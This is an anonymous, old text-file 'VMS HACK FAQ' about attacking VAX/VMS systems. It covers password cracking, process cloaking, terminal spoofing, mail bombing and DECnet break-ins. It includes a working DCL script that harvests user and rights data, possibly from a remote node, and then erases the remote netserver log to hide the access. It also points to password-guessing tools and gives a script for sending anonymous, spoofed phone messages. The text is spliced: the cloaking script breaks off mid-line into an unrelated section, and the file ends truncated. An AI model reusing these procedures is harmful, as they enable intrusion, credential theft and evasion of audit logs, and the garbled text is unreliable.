File 1/1 (originally 2 parts) By: Who the hell knows? Anonymous?? "VMS HACK FAQ" Questions/Index: 1. VMS Basic information ("What does VMS run on?") 2. Password storage information (SYSUAF.DAT) ("Where the hell is the /etc/passwd file??!?!?!") 3. User storage information (RIGHTSLIST.DAT) 4. Cracking the SYSUAF.DAT ("Is there a version of 'Crack' for VMS machines?") 5. Becoming invisible in VMS ("Is there a 'Cloak' routine in VMS?") 6. SET DEFAULT command ("How the do I change damn directory's?") 7. The infamous "CD" .COM file ("I hate this SET DEFAULT crap") U 8. LOGIN.COM ("Okay, where's my .profile???"). 9. Captive Accounts ("I can't get to DCL"). 10. Terminal Spoofing ("How can I passively gather passwords at a terminal?") 11. User Impersonation ("Can I masquerade as another user?") U 12. Accounting/Auditing ("Who's watching me?") 13. Software Licenses ("Can I pirate VMS software?") 14. Dialouts ("Is there a modem on my system?") VMS File Hack Routines: 1. Disappearing Files ("Can I hide files in VMS?") 2. Linking Files ("Can I create a Unix link-like file?") 3. Scavenging ("Can I undelete someone else's files?") N 4. Checksuming Files ("Can I tell if a file has been modified?") VMS Mail Hack Routines: 1. Fake Mail ("How do I send fake mail to VMS machines?") 2. Unix/VMS Sendmail holes ("Will my sendmail holes work on VMS?") U 3. Mail Bomb ("I need to mailbomb a user from my VMS account, how?) N 4. Mail Users ("Can I found out if a remote account exists via mail?) VMS Phone Hack Routines: 1. Anonymous Phone Messages("How do I become a VAXPhone phreaker?") 2. Phone Directories("How can I do a 'sh users' using the phone protocol?") User/Image Privilege Information: 1. Systems Privileges, Listing and explanation ("How are Priv's setup?") 2. Creating privileged images ("Can I create a SUID Shell on a VMS box?") DECnetwork Information: 1. Brief Description of a DECnet ("What's a DECnet?") 2. What it means to you ("What can it do for me?") 3. Obtaining files/system info/etc ("How do I get information for the remote?") 4. Using remote nodes ("How do I connect interactively?") 5. Getting node lists ("How do I find connectable nodes?") 6. Proxy Logins ("Can't DECnet nodes be protected?") 7. Proxy Logs ("Are Proxy logins logged? Can I use it to break into nodes?") 8. Sneak Routing ("Can I get to a machine I normally couldn't through another machine?") N 9. Remote Procedures ("Can I remotely batch?") TCP/IP Connected VMS Machines: 1. Obtaining remote usernames without "FINGER" ("How do I get usernames if FINGER is disabled?") 2. Changing the image running in FINGER ("How do I link a command name to another so it appears I am running a different image?") U 3. The TCPDUMP sniffer, other programs N Famous VMS Hacks/Holes: 1. Trojan horsies, worms, and trap doors 2. Major version vulnerabilities - More Common Newbie Questions - 1. "What does VMS run on?" VMS (Virtual Memory System) runs on Digital Equipment Corp. (DEC - pronounced, "DECK") VAX (Virtual Address eXtension) and the newer Alpha's. The user uses DCL (DEC Command Language) to interact with the computer. These commands and there syntax are completely different then those of Unix and Unix-like operating systems, thus a completely different mindset is often required (this is the authors opinion). 2. "Where in the hell is the passwd file???!?!?!" There is no /etc/passwd file. All user information is kept in a file called SYSUAF.DAT, which is stored in the directory (or actual the logical) SYS$SYSTEM. This file is usually not readable by "normal" users. VMS standard accounts (SYSTEM, FIELD, etc) no longer have default passwords. VMS has the capability of setting secondary passwords on accounts. 3. One file that is available to "normal" users is SYS$SYSTEM:RIGHTSLIST.DAT. This file has a list of users and their respective rights identifiers. Since the file isn't very readable, an extraction program is a nice tool to have. The following DCL procedure is just an example of such a program and probably shouldn't be used, especially on a large system, because of its inefficiency. It should lead you in the right direction though. $! Program: Extract_Rights.Com $! Author: Tsywt $! $ On Error Then $Goto Exit $! $ If F$mode() .Nes. "INTERACTIVE" then goto BATCH_END $ $ Inquire system "Please enter system" $ If system .eqs. "" $ Then $ Open/share in sys$system:rightslist.dat $ Else $ Open/share in 'system'::sys$system:rightslist.dat $ Endif $ Open/write out users.dat $ Read/nolock in record $Read_Loop1: $ Read/nolock in record /end=Done_Users $! If not at start of environmental identifiers $ If f$extract(16,6,record) .nes. "BATCH " $ Then $ Write out f$extract(0,4,record) + " " + f$extract(16,32,record) $ Else $ Goto Done_Users $ Endif $ Goto Read_Loop1 $Done_Users: $ Close out $ Open/write out rights.dat $ Write out f$extract(0,4,record) + " " + f$extract(16,32,record) $Read_Loop7: $ Read/nolock in record /end=Done_Rights $! holder is null $ If f$extract(8,1,record) .eqs. "" $ Then $ Write out f$extract(0,4,record) + " " + f$extract(16,32,record) $ Endif $ Goto Read_Loop7 $Done_Rights: $ Close out $! $ Open/write out users_ids.dat $ Open in2 users.dat $Read_Loop2: $ position = 0 $ Read/nolock in2 record1 /end=Done_Program $Read_Loop3: $! Go to first record in file because can't do key search on id $ Open/share in3 rights.dat $! Search holders for user id $ Read/nolock/error=Done_No_Id in - record2/index=1/key="''f$extract(0,4,record1)'"/end=Done_No_Id $Read_Loop4: $! Kluge because nulls cause problems on key search $ If f$extract(8,4,record2) .nes. f$extract(0,4,record1) $ Then $ Read/nolock in record2/end=Done_No_Id $ Goto Read_Loop4 $ Endif $! Move to next holder match $ temp_pos = position $Read_Loop5: $ If temp_pos .gt. 0 $ Then $ Read/nolock in record2/end=Read_Loop2 $ If f$extract(8,4,record2) .nes. f$extract(0,4,record1) $ Then $ Goto Read_Loop2 $ Endif $ temp_pos = temp_pos - 1 $ Goto Read_Loop5 $ Endif $Read_Loop6: $! Look for identifier id $ Read/nolock in3 record3/end=Done_No_Id $ If f$extract(0,4,record3) .eqs. f$extract(0,4,record2) $ Then $ Write out f$extract(5,32,record1) + " " + f$extract(5,32,record3) $ position = position + 1 $ Close in3 $ Goto Read_Loop3 $ Endif $ Goto Read_Loop6 $Done_No_Id: $ Write out f$extract(5,32,record1) $ Close in3 $ Goto Read_Loop2 $Done_Program: $Exit: $ Close/error=Close_In2 in $Close_In2: $ Close/error=Close_Out in2 $Close_Out: $ Close out $ Delete/erase users.dat. $ Delete/erase rights.dat. $ If system .nes. "" $ Then $ Submit/after="+:15"/keep/params=('system') extract_rights.com $ Endif $ Exit $Batch_End: $Clean_Up: $! Clean up DECnet logging $ Dir 'p1'::netserver.log $ Purge/erase 'p1'::netserver.log $ Exit 4. "Is there a version of "Crack" that I can run on a VMS machine?" The Unix program, "Crack" will not work, but there are password guessing routines available. The best one I have seen is "GUESS_PASSWORD.EXE", which can be obtained from the following sites. ftp.wku.edu:/vms/fileserv/uaf.zip ftp.spc.edu:/macro32/savesets/uaf.zip In order for the routine to work, you need access to the SYSUAF.DAT. This version works on both OpenVMS VAX and OpenVMS AXP. There is also a program available for the PC called VMSCrack 1.0. Once again, it requires that you have access to the SYSUAF.DAT so that you can copy it to the PC. BTW: The VMS system maintains its own password dictionary to screen for common passwords if desired. SYS$LIBRARY:VMS$PASSWORD_DICTIONARY.DATA contains ~43000 words. And if you think your machine doesn't contain X-rated stuff(ok, maybe R), check again. 5. "Can I 'Cloak' in routine in VMS?" Yes. Below is the code needed to make your process invisible to "FINGER", "SHOW USERS", etc... Also, check out Bruce Ellis' "Hitchhiker's Guide to VMS" First, create the following file: Name: BUILD_INVISIBLE.COM ---------------------------------[Cut Here]----------------------------------- $ save_verify = 'f$verify(0)' $ system = "vax" !Set to "alpha" for Alpha $! $! File to build Ehud Gavron's INVISIBLE $! $! Author: Hunter Goatley $! $ say := write sys$outp - VAXPhone Information - 1. The phone protocol allows you to send messages. Example follows: $! To send anonymous or fake messages(except for remote node system admins - $! phone server logs) through the PHONE mailbox to any user logged on the NET, $! similar to phone ringing messages broadcast to users' terminals; must only $! have NETMBX privilege $! Note: $! This has the unfortunate side effect of kicking the user off his phone if $! its not a patched version. $! $ debug = "F" $ null_byte[0,8] = 0 $ true_byte[0,8] = 1 $ false_byte[0,8] = 0 $ id_rmt_user[0,8] = 7 !text = id of remote user, status rtn $ ring_rmt_user[0,8] = 8 !text = 1 byte, true if first ring, sts rtn $ hang_up[0,8] = 9 !link broken, no status $ master_busy[0,8] = 10 !when requested to do other functions $ master_answer[0,8] = 11 !from another master $ master_reject[0,8] = 12 !from another master $ slave_exit[0,8] = 13 !command to slave $ text[0,8] = 14 !text >= 1 char frag $ request_dir[0,8] = 15 !null returned when done $ force_third_party[0,8] = 17 !text is id of 3rd party $ on_hold[0,8] = 18 !put target on hold $ off_hold[0,8] = 19 !take target off hold $! $ status_unknown = 0 !Unknown problem $ status_success = 1 !The operation was completed successfully. $ status_isyntax = 2 !Invalid user syntax $ status_nocomm = 3 !Slave could not communicate with user $ status_missunam = 4 ! missing user name $ status_nopriv = 5 !The slave does not have necessary privileges. $ status_noexist = 6 !The specified Target user does not exist. $ status_badterm = 7 !The Target's terminal cannot be used by PHONE. $ status_logoff = 8 !The Target logged off during the procedure. $ status_offhook = 9 !Target phone off hook (e.g., /NOBROADCAST set). $! $ remote_node = P1 $ if P1 .eqs. "" then read sys$command remote_node /prompt="node : " $ remote_user = p2 $ if P2 .eqs. "" then read sys$command remote_user /prompt="user : " $ remote_user := 'remote_user ! remove blanks and lowercases $ local_user_in = "''P3'" $ if P3 .eqs. "" then read sys$command local_user_in /prompt="text : " $ local_user = "msg:: " + local_user_in + - " " - + null_byte $ open/read/write link 'remote_node'::"29=" $ write link id_rmt_user,local_user,remote_user $ read link ans $ if f$cvui(0,8,ans) .ne. status_success then goto error $ if debug then write sys$output "Link to phone setup" $ if local_user_in .eqs. "" then goto exit $ write link ring_rmt_user,local_user,true_byte $ read link ans $ if f$cvui(0,8,ans) .ne. status_success then goto error $ if debug then write sys$output "1 ringy-dingy" $ count = 1 $ on control_y then goto exit $ goto exit $LOOP: $ write link ring_rmt_user,local_user,false_byte $ read link ans $ if f$cvui(0,8,ans) .ne. status_success then goto error $ if count .ge. 3 then goto exit $ count = count +1 $ if debug then write sys$output count," ringy-dingies" $ goto loop $EXIT: $ write link slave_exit,local_user $ close link $ if debug then write sys$output "Link cleared" $ exit $ERROR: $! under development $ write sys$output "An error has occured." $ close link $ exit 2. The phone protocol allows you to get a list of interactive users on a system. From DEC's own archives, example follows: $ vfy = f$verify(f$integer(f$logical("debug")) .or. f$integer('debug'+0)) $ if f$cvui(1,1,'debug'+0) .or. f$cvui(1,1,f$logical("debug")+0) - then write sys$error "File: PHONEDIR.COM, 29-Feb-1984" $!++ $! PHONEDIR.COM, E2.0 28-Oct-1985 $! $! COPYRIGHT (c) 1984 By $! DIGITAL EQUIPMENT CORPORATION, Maynard, Massachusetts 01754. $! All Rights Reserved. $! $! This software is furnished without license and may be used and copied $! only with the inclusion of the above copyright notice. No title to and $! ownership of the software is hereby transferred. $! $! The information in this software is subject to change without notice $! and should not be construed as a commitment by Digital Equipment $! Corporation. $! $! Digital assumes no responsibility for the use or reliability of this $! software. $!-- $!++ $! Author: SWM, 29-Feb-84, PARROT::SWM $! $! Edited: $! 23-Nov-84 SWM, User lookup, V3 compatablility, Psthru capability. $! 24-Nov-84 DC, Added logical name translation. $! 30-Nov-84 DC, '_' overrides logical, infn loop check. $! 27-Oct-85 SWM, Protocol fix, pipelining, clean up code. $! $! Abstract: $! Take a directory of users across network via phone protocol. $! $! Inputs: P1 = Node:: (or Node::Node::...) to get user list from; $! or Node::User to check on. Remote user can be specified as $! separate parameter P2. Double colon optional if single node. $! $!-- $INITIALIZE: $ on control_y then goto close $ set noon $ v4 = "true" $ if f$extr(0,2,f$getsyi("version")) .eqs. "V3" then v4 = "false" $!$ error_status = %x1001C002 $ null[0,8] = 0 $!$ if v4 then old_msg = f$envi("message") $!$ set message /nofacility/noseverity/noidentification/notext $! $ask_node_name: $ if p1 .eqs. "" then read/end=exit/error=exit sys$command p1 /prompt="Node? " $ if p1 .eqs. "" then goto exit $! $! allow override of node::user logical names $ sanity_check = 0 $log_name_loop: $ underscore_found = f$locate("_",p1) .eq. 0 $ if underscore_found then goto got_node_name $ if f$logi(p1) .eqs. "" then goto got_node_name $ p1 = f$logi(p1) $ sanity_check = sanity_check + 1 $ if sanity_check .le. 64 then goto log_name_loop $ goto error $! $got_node_name: $! add username to node string if specified as separate parameter $ if p2 .nes. "" then - if f$extr(f$leng(p1)-2,2,p1) .eqs. "::" then p1 = f$extr(0,f$leng(p1)-2,p1) $ if p2 .nes. "" then p1 = p1 + "::" + p2 $! check if single node specified without dbbl colon. $ if p2 .eqs. "" then - if f$parse(p1,,,"node") .eqs. "" then p1 = p1 + "::" $!- if f$extr(f$leng(p1)-2,2,p1) .nes. "::" then p1 = p1 + "::" $! $ if v4 then p1 = f$edit(p1,"trim,upcase,uncomment") $ if .not. v4 then p1 := 'p1' $ remote_user_name = f$parse(p1,,,"name") $ node = f$extr(0,f$leng(p1)-f$leng(remote_user_name),p1) $ if node .eqs. "" then node = f$logi("sys$node") $! commented out doesn't work if access ctrl (f$parse hides password). $!$ remote_user = node - f$parse(f$extr(0,f$leng(node)-2,node),,,"node") - $!- + remote_user_name ! remove any psthru node names... $! $ sanity_check = 0 $ temp = node $ node_string = "" $! loop to find name of destination node for use in phone protocol... $dest_node_loop: $ loc = f$loca("::",temp) $ node_string = node_string + f$parse(f$extr(0,loc+2,temp),,,"node") $! commented out for alternate node_string display if using access ctrl. $!$ node_string = node_string + f$extr(0,loc,temp) $!$ node_string = f$extr(0,f$loca("""",node_string),node_string) + "::" $ remote_user = f$extr(0,loc,temp) ! last node $ remote_user = f$extr(0,f$loca("""",remote_user),remote_user) ! minus a/c. $ temp = f$extr(loc+2,999,temp) $ sanity_check = sanity_check + 1 $ if f$loca("::",temp) .ne. f$leng(temp) .and. sanity_check .lt. 32 - then goto dest_node_loop $ remote_user = remote_user + "::" + remote_user_name $! $ if v4 then local_user = f$logi("sys$node") + - f$edit(f$getjpi("","pid"),"trim,upcase") $ if .not. v4 then local_user := 'f$logi("sys$node")''f$getjpi("","pid")' $ local_user = local_user - "_" + null ! asciz string $! $CREATE_LINK: $! noon is set so display error message $ open/read/write slave 'node'"29=" $ save_status = $status $!$ if save_status .eq. error_status then goto unreachable $ if .not. save_status then goto exit $! $ if remote_user_name .eqs. "" then goto dir_function $LOCATE_FUNCTION: $ message[0,8] = 7 ! ID remote user $ message = message + local_user + remote_user $ write/error=error slave message $ read/end=error/error=error slave record $ if f$cvui(0,8,record) .eq. 1 then - write sys$output "''remote_user' is currently available." $! Note: These response values, while defined in the phone protocol do $! not seem to be supported in response to the ID function for VAXPhone. $ if f$cvui(0,8,record) .eq. 6 then - write sys$output "''remote_user' is not available." $ if f$cvui(0,8,record) .eq. 7 then - write sys$output "''remote_user''s phone is not usable by phone." $ if f$cvui(0,8,record) .eq. 9 then - write sys$output "''remote_user''s phone is off hook (/NOBROADCAST)." $ if (f$cvui(0,8,record) .ne. 1) .and. (f$cvui(0,8,record) .ne. 6) .and. - (f$cvui(0,8,record) .ne. 7) .and. (f$cvui(0,8,record) .ne. 9) then - write sys$output "''f$fao("Bad status received = !2ZB.",f$cvui(0,8,record)) $ exit_command[0,8] = 13 $ write/error=error slave exit_command,local_user $ goto close $! $DIR_FUNCTION: $ message[0,8] = 15 ! Request directory $ message = message + local_user $ write/error=error slave message $ write/error=error slave message ! Pipeline requests!!! $ write/error=error slave message $ write/error=error slave message $! Pipelining limited to 2 extra requests max to keep procedure from hanging. $! Worst case limit is (DECnet_Pipeline_Quota/DECnet_Buffer_Size) * 2 + 1 $print_header: $ count = 0 $ write sys$output "" $ write sys$output " Directory of Users on Node ",node_string $ write sys$output "" $! skip pipeline hack code as RMS timeouts don't with DECnet yet. $ GOTO LOOP $!$ if .not. v4 then write/error=error slave message $ if .not. v4 then goto loop $! Put up to 8 requests in logical link pipe... $ sanity_check = 3 ! number msgs in pipe. $pipeline_hack: $ sanity_check = sanity_check + 1 $ if sanity_check .ge. 8 then goto loop $ write/error=error slave message $ read/end=eof/error=pipeline_hack/timeout=0 slave record $ goto loop_alt_entry $! $loop (-eof-) (c)nXo/loteknologies